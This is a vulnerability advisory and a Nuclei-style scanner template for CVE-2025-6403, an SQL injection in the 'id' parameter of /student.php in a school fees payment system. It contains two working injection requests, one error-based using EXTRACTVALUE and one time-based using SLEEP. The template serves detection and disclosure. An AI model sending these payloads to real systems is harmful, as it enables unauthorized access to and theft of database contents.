A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
PoC代码[已公开]
id: CVE-2025-6403
info:
name: Code-Projects School Fees Payment System 1.0 - SQL Injection
author: hnd3884
severity: critical
description: |
A vulnerability was found in code-projects School Fees Payment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
impact: |
Remote attackers can execute arbitrary SQL commands, potentially leading to data theft or modification.
remediation: |
Update to the latest version.
reference:
- https://www.cve.org/CVERecord?id=CVE-2025-6403
- https://avd.aquasec.com/nvd/2025/cve-2025-6403/
- https://github.com/tuooo/CVE/issues/16
- https://vuldb.com/?id.313335
- https://code-projects.org/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-6403
cwe-id: CWE-74
epss-score: 0.0158
epss-percentile: 0.80987
cpe: cpe:2.3:a:code-projects:school_fees_payment_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
tags: cve,cve2025,sqli,code_projects,unauth,school_fees_payment_system,time-based
flow: http(1) || http(2)
http:
- raw:
- |
GET /student.php?action=delete&id=1'+AND+EXTRACTVALUE(0x0a,CONCAT(0x0a,VERSION()))--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "XPATH syntax error")'
condition: and
- raw:
- |
GET /student.php?action=delete&id=1'+AND+SLEEP(7)--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration >= 7'
- 'status_code == 302'
- 'contains(body, "login.php")'
condition: and
# digest: 490a0046304402204dc53e33f87839452cc6a5e7d2b838449e477f6bf67d3549635c43cb3b40eb81022073e8019de375eb9ed70cd8e5b0d309dad461179e57a019ae6556f46670e4f9ba:922c64590222798bb761d5b6d8e72950